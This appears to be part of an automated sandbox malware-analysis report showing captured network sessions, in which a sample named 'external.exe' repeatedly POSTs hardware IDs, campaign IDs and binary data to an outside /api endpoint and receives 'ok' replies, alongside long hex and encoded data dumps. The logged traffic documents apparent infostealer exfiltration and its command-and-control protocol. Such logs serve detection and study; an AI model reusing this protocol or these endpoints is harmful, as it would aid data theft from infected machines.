                                                                                                        2024-12-22 23:12:03 UTC240INData Raw: 31 34 37 62 0d 0a 30 74 56 75 48 56 6c 67 75 72 51 70 65 6d 43 49 79 57 59 51 4e 67 63 38 31 4a 4c 57 6b 45 47 34 37 39 56 2b 34 33 57 52 54 73 71 70 39 78 67 2f 59 31 53 57 6c 6c 6f 66 51 72 4b 39 46 47 56 54 4b 78 36 31 39 76 53 71 4a 39 6d 44 70 68 76 50 56 2b 63 6a 36 4f 69 7a 44 33 45 71 42 5a 61 57 54 41 4a 43 73 70 49 64 4d 6c 4e 70 48 75 36 77 73 2f 6f 6a 32 59 4f 33 48 34 67 61 34 53 4b 70 75 72 6b 4a 64 54 77 44 33 74 56 46 46 77 58 74 72 41 64 36 57 47 35 52 76 50 2f 30 76 47 50 64 6c 66 64 45 77 54 6a 30 4f 71 75 66 74 42 31 32 65 78 32 57 7a 77 73 66 44 71 72 7a 52 48 46 54 5a 56 43 79 39 72 33 34 4b 64 43 4c 74 68 71 4a 42 66 67 6f 6f 72 71 33 43 6e 51 32 43 73 72 59 54 78 41 4f 36 36 59 48 4d 68
                                                                                                        Data Ascii: 147b0tVuHVlgurQpemCIyWYQNgc81JLWkEG479V+43WRTsqp9xg/Y1SWllofQrK9FGVTKx619vSqJ9mDphvPV+cj6OizD3EqBZaWTAJCspIdMlNpHu6ws/oj2YO3H4ga4SKpurkJdTwD3tVFFwXtrAd6WG5RvP/0vGPdlfdEwTj0OquftB12ex2WzwsfDqrzRHFTZVCy9r34KdCLthqJBfgoorq3CnQ2CsrYTxAO66YHMh
                                                                                                        2024-12-22 23:12:03 UTC1369INData Raw: 6f 6c 57 61 36 77 37 4c 4a 77 36 49 36 6d 44 5a 51 61 34 79 72 6f 72 2f 6b 56 50 7a 77 4f 6d 49 34 4c 45 41 37 6b 72 67 64 39 55 32 52 65 70 50 2b 30 38 53 76 53 69 62 30 54 6a 68 6a 39 4a 71 2b 34 76 67 74 77 50 41 72 65 32 55 68 59 54 4b 71 73 48 44 49 4d 4a 58 36 6d 38 37 66 6d 4c 73 76 4e 71 46 4b 59 56 2f 51 67 36 4f 6a 33 43 6e 45 36 44 39 6a 45 51 78 4d 4a 37 37 6b 50 65 31 6c 6f 58 72 76 36 75 2f 45 6a 33 59 65 39 45 34 73 54 2f 69 47 75 73 4c 64 4d 4d 58 73 46 77 4a 59 54 57 43 48 76 75 77 4e 2b 51 69 64 6b 39 75 2f 36 36 32 50 64 67 66 64 45 77 52 2f 32 4c 36 75 37 75 41 39 33 4d 42 44 59 78 45 30 56 42 2f 69 74 41 58 78 65 5a 6b 79 38 2f 72 4c 78 4b 74 47 45 73 68 75 46 56 37 31 73 72 36 6a 33 56 44 38 61 44 39 50 61 51 51 38 43 71 72 52 4b 61
                                                                                                        Data Ascii: olWa6w7LJw6I6mDZQa4yror/kVPzwOmI4LEA7krgd9U2RepP+08SvSib0Tjhj9Jq+4vgtwPAre2UhYTKqsHDIMJX6m87fmLsvNqFKYV/Qg6Oj3CnE6D9jEQxMJ77kPe1loXrv6u/Ej3Ye9E4sT/iGusLdMMXsFwJYTWCHvuwN+Qidk9u/662PdgfdEwR/2L6u7uA93MBDYxE0VB/itAXxeZky8/rLxKtGEshuFV71sr6j3VD8aD9PaQQ8CqrRKa
                                                                                                        2024-12-22 23:12:03 UTC1369INData Raw: 36 2b 72 4c 39 4c 74 62 4e 2b 56 79 47 44 37 4e 30 36 4a 71 30 47 48 77 78 51 4f 33 56 52 52 59 46 2f 4f 73 62 50 45 30 6c 57 62 71 77 37 4c 49 75 32 34 57 78 44 6f 34 61 38 43 4b 6d 76 37 49 44 64 7a 73 43 31 64 4e 50 45 77 6e 70 70 67 42 67 58 6d 56 57 73 2f 47 2b 2b 47 4f 55 7a 62 41 45 77 55 2b 7a 48 62 2b 37 39 54 6c 38 4e 51 7a 66 77 41 73 48 54 50 50 72 41 33 34 55 50 52 36 37 2b 4c 48 33 4c 4e 75 48 75 52 6d 4c 47 2f 73 69 71 36 4b 34 43 48 38 33 43 74 4c 62 52 52 77 4b 34 36 41 50 64 46 52 6b 56 50 61 2b 39 50 55 37 6d 74 58 33 4b 49 59 62 2f 69 50 71 68 62 51 43 63 54 77 55 6d 4d 6b 46 41 55 4c 74 70 30 51 71 46 47 6c 58 74 76 75 2b 39 69 50 64 67 4c 49 66 68 68 54 2b 4b 36 4b 2b 73 41 68 7a 4d 67 2f 65 31 6b 77 63 42 2f 69 75 44 58 35 59 4a 52
                                                                                                        Data Ascii: 6+rL9LtbN+VyGD7N06Jq0GHwxQO3VRRYF/OsbPE0lWbqw7LIu24WxDo4a8CKmv7IDdzsC1dNPEwnppgBgXmVWs/G++GOUzbAEwU+zHb+79Tl8NQzfwAsHTPPrA34UPR67+LH3LNuHuRmLG/siq6K4CH83CtLbRRwK46APdFRkVPa+9PU7mtX3KIYb/iPqhbQCcTwUmMkFAULtp0QqFGlXtvu+9iPdgLIfhhT+K6K+sAhzMg/e1kwcB/iuDX5YJR
                                                                                                        2024-12-22 23:12:03 UTC1369INData Raw: 37 57 33 44 7a 62 41 51 77 55 2b 7a 4a 61 47 69 75 51 4a 32 4e 67 54 51 30 55 55 56 43 65 79 67 41 33 56 53 61 46 61 37 39 62 66 7a 4a 39 43 66 74 42 65 4c 47 76 6c 73 35 76 43 77 46 44 39 6a 51 76 2f 61 59 67 67 5a 2b 4c 31 45 62 52 70 38 48 72 48 38 39 4b 70 6a 32 59 4b 2b 45 34 6b 66 2f 43 4f 73 76 72 45 4b 63 6a 34 4e 30 73 52 44 46 67 2f 68 70 41 39 67 56 47 68 61 75 76 53 38 2b 53 6d 61 77 2f 63 62 6d 56 65 72 62 4a 32 39 75 41 78 38 4c 55 4c 48 6d 46 4a 59 42 65 62 72 58 44 4a 59 61 31 36 35 2f 4c 6a 35 4b 39 75 42 75 52 75 45 48 76 73 6b 75 72 47 7a 42 48 34 31 44 64 6e 53 54 68 30 47 37 61 38 43 66 52 51 72 48 72 48 6f 39 4b 70 6a 39 61 71 43 58 71 41 74 73 7a 50 6d 71 66 63 4c 63 33 74 61 6d 4e 70 49 46 41 72 6c 72 51 31 2b 58 6d 78 56 75 76 75
                                                                                                        Data Ascii: 7W3DzbAQwU+zJaGiuQJ2NgTQ0UUVCeygA3VSaFa79bfzJ9CftBeLGvls5vCwFD9jQv/aYggZ+L1EbRp8HrH89Kpj2YK+E4kf/COsvrEKcj4N0sRDFg/hpA9gVGhauvS8+Smaw/cbmVerbJ29uAx8LULHmFJYBebrXDJYa165/Lj5K9uBuRuEHvskurGzBH41DdnSTh0G7a8CfRQrHrHo9Kpj9aqCXqAtszPmqfcLc3tamNpIFArlrQ1+XmxVuvu
                                                                                                        2024-12-22 23:12:03 UTC904INData Raw: 6f 69 34 48 59 41 52 34 53 75 68 6f 72 6b 42 63 44 4d 4b 30 64 64 50 48 51 2f 73 70 77 35 7a 55 32 74 51 76 72 44 36 73 69 54 43 7a 65 39 63 6f 41 66 6f 50 72 36 39 6c 67 46 77 65 78 32 57 7a 77 73 66 44 71 72 7a 52 48 74 47 59 56 4f 6b 2b 62 50 38 4c 4e 6d 66 74 68 47 4b 42 66 51 6a 72 4c 65 37 43 6e 41 39 41 39 33 63 52 78 38 48 34 61 51 49 4d 68 6f 6c 57 61 36 77 37 4c 49 4e 30 5a 36 67 48 34 38 63 35 54 66 6f 72 2f 6b 56 50 7a 77 4f 6d 49 34 4c 47 77 6e 68 72 77 52 2b 56 47 46 54 74 75 4b 37 39 53 54 54 68 71 55 57 68 68 44 34 4a 4b 4f 2f 73 52 35 7a 4e 52 44 64 78 46 6c 59 54 4b 71 73 48 44 49 4d 4a 57 69 78 34 4b 54 78 59 65 75 62 74 41 71 4b 47 76 39 73 74 2f 36 75 54 48 67 33 51 6f 43 57 54 52 63 4c 36 61 51 46 65 31 68 6f 57 37 2f 31 74 66 51 6e
                                                                                                        Data Ascii: oi4HYAR4SuhorkBcDMK0ddPHQ/spw5zU2tQvrD6siTCze9coAfoPr69lgFwex2WzwsfDqrzRHtGYVOk+bP8LNmfthGKBfQjrLe7CnA9A93cRx8H4aQIMholWa6w7LIN0Z6gH48c5Tfor/kVPzwOmI4LGwnhrwR+VGFTtuK79STThqUWhhD4JKO/sR5zNRDdxFlYTKqsHDIMJWix4KTxYeubtAqKGv9st/6uTHg3QoCWTRcL6aQFe1hoW7/1tfQn
                                                                                                        2024-12-22 23:12:03 UTC1369INData Raw: 33 34 61 31 0d 0a 52 38 69 32 67 75 4c 63 4b 64 54 38 42 30 64 56 4d 45 51 54 68 71 41 35 39 55 32 4e 61 74 76 75 7a 2f 43 58 66 68 72 35 63 7a 31 66 30 4e 4f 6a 6f 39 79 70 63 4b 52 44 71 32 45 67 44 51 76 58 6c 48 54 4a 54 61 52 37 75 73 4c 2f 36 4c 4d 69 49 76 68 53 46 48 76 4d 6f 6f 72 32 77 44 48 6f 32 42 39 7a 59 54 78 38 43 35 71 51 44 65 6c 74 68 58 72 6d 77 2b 72 49 6b 77 73 33 76 58 4b 45 63 35 51 32 6d 75 36 56 4d 59 48 55 62 6d 4e 46 48 57 46 71 71 70 51 31 7a 58 47 74 53 76 76 53 6d 38 69 6a 54 67 72 59 54 67 52 54 79 4a 71 43 69 73 51 78 30 4d 77 58 51 30 6b 55 4b 41 2b 58 72 53 6a 4a 54 66 52 37 75 73 49 58 6b 4a 4e 32 43 39 54 57 47 44 50 49 6d 71 37 75 37 54 47 42 31 47 35 6a 52 52 31 68 61 71 71 59 49 66 31 42 33 55 72 62 77 76 66 55 70
                                                                                                        Data Ascii: 34a1R8i2guLcKdT8B0dVMEQThqA59U2Natvuz/CXfhr5cz1f0NOjo9ypcKRDq2EgDQvXlHTJTaR7usL/6LMiIvhSFHvMoor2wDHo2B9zYTx8C5qQDelthXrmw+rIkws3vXKEc5Q2mu6VMYHUbmNFHWFqqpQ1zXGtSvvSm8ijTgrYTgRTyJqCisQx0MwXQ0kUKA+XrSjJTfR7usIXkJN2C9TWGDPImq7u7TGB1G5jRR1haqqYIf1B3UrbwvfUp
                                                                                                        2024-12-22 23:12:03 UTC1369INData Raw: 6d 41 47 2f 6b 72 70 71 4b 32 42 6e 4d 36 42 64 2f 64 57 52 4d 51 34 61 4d 48 66 46 78 73 58 72 6a 77 74 66 38 6a 6d 73 50 33 47 35 6c 58 71 32 79 4e 6b 36 41 61 64 58 6b 68 7a 38 42 42 48 77 37 38 6f 41 56 78 51 6d 68 4f 39 72 37 30 34 79 54 4c 7a 65 38 4b 6b 51 44 30 4d 2b 61 70 39 77 74 7a 65 31 71 59 33 55 51 57 44 2b 47 76 44 58 64 63 5a 6c 75 7a 2b 72 6a 2b 49 74 4b 45 76 52 6d 45 45 66 6b 76 70 72 2b 32 41 48 73 79 44 4e 47 57 42 56 67 46 38 75 74 63 4d 6d 4a 31 57 61 37 39 70 4c 41 52 32 5a 79 6d 43 59 77 48 39 57 36 48 73 37 73 50 65 6a 77 53 6d 4d 6b 46 41 55 4c 74 70 30 51 71 46 47 56 61 75 76 4f 7a 2f 43 7a 58 67 72 41 58 6a 68 33 39 50 71 65 31 76 77 42 33 4e 68 44 53 33 46 6b 52 43 2b 65 6c 44 47 42 58 4a 52 44 32 39 36 79 79 65 35 71 2f 76
                                                                                                        Data Ascii: mAG/krpqK2BnM6Bd/dWRMQ4aMHfFxsXrjwtf8jmsP3G5lXq2yNk6AadXkhz8BBHw78oAVxQmhO9r704yTLze8KkQD0M+ap9wtze1qY3UQWD+GvDXdcZluz+rj+ItKEvRmEEfkvpr+2AHsyDNGWBVgF8utcMmJ1Wa79pLAR2ZymCYwH9W6Hs7sPejwSmMkFAULtp0QqFGVauvOz/CzXgrAXjh39Pqe1vwB3NhDS3FkRC+elDGBXJRD296yye5q/v
                                                                                                        2024-12-22 23:12:03 UTC1369INData Raw: 2b 50 4b 75 31 73 44 4a 42 4e 51 58 4d 30 55 55 65 41 71 72 6c 52 48 30 55 50 57 66 32 75 50 54 4e 62 5a 71 56 39 30 54 42 49 76 41 69 70 72 65 68 48 54 49 59 46 63 37 63 55 46 6f 6b 37 62 6f 4e 5a 46 6c 33 48 76 69 77 73 72 4a 37 69 73 50 33 47 4a 42 58 71 33 7a 36 36 2b 4a 66 4b 47 74 51 78 35 68 53 57 42 53 71 38 31 59 38 46 48 63 65 37 72 44 7a 38 54 48 49 69 37 51 4b 67 6c 44 4e 45 6f 69 37 6f 51 31 79 4d 41 37 6d 36 46 34 62 44 4f 53 73 45 6d 4d 55 4b 78 36 35 73 4f 7a 4c 59 35 4c 4e 69 46 4c 42 44 37 4e 30 36 49 57 30 41 6e 45 38 46 4d 6d 62 61 78 4d 55 36 36 59 50 66 68 5a 6b 55 36 62 33 39 4c 78 6a 33 4d 33 76 54 4d 39 58 39 7a 33 6f 36 4f 64 65 4a 47 35 52 6a 34 59 5a 42 30 7a 7a 36 78 49 79 44 44 63 51 39 75 4c 30 71 6d 4f 64 6a 71 55 4f 68 78
                                                                                                        Data Ascii: +PKu1sDJBNQXM0UUeAqrlRH0UPWf2uPTNbZqV90TBIvAiprehHTIYFc7cUFok7boNZFl3HviwsrJ7isP3GJBXq3z66+JfKGtQx5hSWBSq81Y8FHce7rDz8THIi7QKglDNEoi7oQ1yMA7m6F4bDOSsEmMUKx65sOzLY5LNiFLBD7N06IW0AnE8FMmbaxMU66YPfhZkU6b39Lxj3M3vTM9X9z3o6OdeJG5Rj4YZB0zz6xIyDDcQ9uL0qmOdjqUOhx
                                                                                                        2024-12-22 23:12:03 UTC1369INData Raw: 75 2f 64 43 50 7a 31 43 67 49 51 46 57 41 62 37 36 31 77 69 42 6a 34 4c 35 61 66 6b 6f 44 79 55 6c 50 63 4b 77 55 2b 68 59 75 69 69 39 31 51 2f 66 41 48 4b 78 45 30 62 46 4f 6e 73 4f 6b 78 79 5a 6c 6d 77 38 37 72 6c 4d 70 69 69 74 42 65 4e 47 2f 51 36 6c 6f 36 69 44 33 45 31 42 63 37 48 43 31 5a 43 35 65 74 63 53 78 52 30 56 4c 47 38 2f 4c 34 79 79 59 4f 38 43 6f 5a 58 7a 47 4c 6f 71 50 64 55 50 77 34 42 31 74 68 4d 44 68 4f 6e 6a 51 64 31 55 6d 5a 51 6f 65 48 30 76 47 50 63 7a 65 39 4f 7a 31 66 33 50 65 6a 6f 35 31 34 6b 62 6c 47 50 68 68 6b 48 54 50 50 72 45 6a 49 4d 4e 68 44 32 34 76 53 71 59 35 32 44 75 68 32 43 47 66 41 2b 75 72 61 30 47 6e 78 38 50 4f 62 7a 52 68 55 48 35 4b 77 36 54 48 56 76 54 72 76 2f 73 38 77 64 37 5a 79 77 44 4d 4d 78 38 44 71
                                                                                                        Data Ascii: u/dCPz1CgIQFWAb761wiBj4L5afkoDyUlPcKwU+hYuii91Q/fAHKxE0bFOnsOkxyZlmw87rlMpiitBeNG/Q6lo6iD3E1Bc7HC1ZC5etcSxR0VLG8/L4yyYO8CoZXzGLoqPdUPw4B1thMDhOnjQd1UmZQoeH0vGPcze9Oz1f3Pejo514kblGPhhkHTPPrEjIMNhD24vSqY52Duh2CGfA+ura0Gnx8PObzRhUH5Kw6THVvTrv/s8wd7ZywDMMx8Dq


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.449732104.21.19.354437140C:\Users\user\Desktop\external.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-22 23:12:05 UTC278OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=XQ441IQ67QVVKRAZ
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 18158
                                                                                                        Host: wordyfindy.lat
                                                                                                        2024-12-22 23:12:05 UTC15331OUTData Raw: 2d 2d 58 51 34 34 31 49 51 36 37 51 56 56 4b 52 41 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 30 32 45 45 46 46 30 37 39 42 46 35 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 58 51 34 34 31 49 51 36 37 51 56 56 4b 52 41 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 58 51 34 34 31 49 51 36 37 51 56 56 4b 52 41 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 61 6c 61 65 6c 6a 68 73 66 64 6d
                                                                                                        Data Ascii: --XQ441IQ67QVVKRAZContent-Disposition: form-data; name="hwid"8F02EEFF079BF58F303C757AA71AA852--XQ441IQ67QVVKRAZContent-Disposition: form-data; name="pid"2--XQ441IQ67QVVKRAZContent-Disposition: form-data; name="lid"LPnhqo--alaeljhsfdm
                                                                                                        2024-12-22 23:12:05 UTC2827OUTData Raw: a7 66 35 eb c7 4a 53 81 68 2f 88 dd e0 cb 99 64 7e e6 28 bf 13 cc 94 75 5e c1 bc c6 a2 f2 ea 27 0a 66 e1 9f 97 c5 15 2e a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81
                                                                                                        Data Ascii: f5JSh/d~(u^'f.\f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE
                                                                                                        2024-12-22 23:12:17 UTC1141INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 22 Dec 2024 23:12:17 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=fcahehvst29f6kr8bcvl0shc5c; expires=Thu, 17 Apr 2025 16:58:55 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZHzOdWIsKEqHsh%2B2JkUzw53q90MA%2Fv%2BA9aN5iN%2Bhcv%2Br3MAgjTV0ImWl8ev%2FT0FcQnhp68JDoXNPIyu6E7Bdb5AfYUzPqLjXxMdCMuZT0j6bwlZ3XMgAfBA%2BAIwE58T7%2Bw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f63cb712ae843f3-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1717&min_rtt=1713&rtt_var=652&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2833&recv_bytes=19116&delivery_rate=1666666&cwnd=204&unsent_bytes=0&cid=cd514e6f26c5145e&ts=12175&x=0"
                                                                                                        2024-12-22 23:12:17 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2024-12-22 23:12:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        3192.168.2.449735104.21.19.354437140C:\Users\user\Desktop\external.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-22 23:12:18 UTC279OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=7H38HNDLAUCUAG4XRE
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 8791
                                                                                                        Host: wordyfindy.lat
                                                                                                        2024-12-22 23:12:18 UTC8791OUTData Raw: 2d 2d 37 48 33 38 48 4e 44 4c 41 55 43 55 41 47 34 58 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 30 32 45 45 46 46 30 37 39 42 46 35 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 37 48 33 38 48 4e 44 4c 41 55 43 55 41 47 34 58 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 48 33 38 48 4e 44 4c 41 55 43 55 41 47 34 58 52 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 61 6c 61 65 6c
                                                                                                        Data Ascii: --7H38HNDLAUCUAG4XREContent-Disposition: form-data; name="hwid"8F02EEFF079BF58F303C757AA71AA852--7H38HNDLAUCUAG4XREContent-Disposition: form-data; name="pid"2--7H38HNDLAUCUAG4XREContent-Disposition: form-data; name="lid"LPnhqo--alael
                                                                                                        2024-12-22 23:12:19 UTC1123INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 22 Dec 2024 23:12:19 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=lr0pfrer72c7ilmbric6sq1bpf; expires=Thu, 17 Apr 2025 16:58:58 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5VeFMgA7FfW3t78fzn6DPlnZE3tiDH%2BrIQm39vnx6nbp7gUDT9YwHNanSWlvYiprhjzij1qT5mcsHoRXUyu10bL8d3TMztn1nmC4SFCeMJiBdpR769c4ovdeXvHiQVKI6A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8f63cbc59d3a42f7-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1703&min_rtt=1693&rtt_var=655&sent=6&recv=14&lost=0&retrans=0&sent_bytes=2831&recv_bytes=9728&delivery_rate=1645997&cwnd=171&unsent_bytes=0&cid=b8fb014ac20d9a35&ts=800&x=0"
                                                                                                        2024-12-22 23:12:19 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2024-12-22 23:12:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.449738104.21.19.354437140C:\Users\user\Desktop\external.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2024-12-22 23:12:20 UTC278OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=U0L58UWFFPJHJWO6
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 20432
                                                                                                        Host: wordyfindy.lat
                                                                                                        2024-12-22 23:12:20 UTC15331OUTData Raw: 2d 2d 55 30 4c 35 38 55 57 46 46 50 4a 48 4a 57 4f 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 46 30 32 45 45 46 46 30 37 39 42 46 35 38 46 33 30 33 43 37 35 37 41 41 37 31 41 41 38 35 32 0d 0a 2d 2d 55 30 4c 35 38 55 57 46 46 50 4a 48 4a 57 4f 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 55 30 4c 35 38 55 57 46 46 50 4a 48 4a 57 4f 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 61 6c 61 65 6c 6a 68 73 66 64 6d
                                                                                                        Data Ascii: --U0L58UWFFPJHJWO6Content-Disposition: form-data; name="hwid"8F02EEFF079BF58F303C757AA71AA852--U0L58UWFFPJHJWO6Content-Disposition: form-data; name="pid"3--U0L58UWFFPJHJWO6Content-Disposition: form-data; name="lid"LPnhqo--alaeljhsfdm
                                                                                                        2024-12-22 23:12:20 UTC5101OUTData Raw: 00 00 00 00 60 93 1b 88 82 85 4d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00
                                                                                                        Data Ascii: `M?lrQMn 64F6(X&7~`aO
                                                                                                        2024-12-22 23:12:21 UTC1141INHTTP/1.1 200 OK
                                                                                                        Date: Sun, 22 Dec 2024 23:12:21 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=lvpn5apa9buaei925qd6fli553; expires=Thu, 17 Apr 2025 16:59:00 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
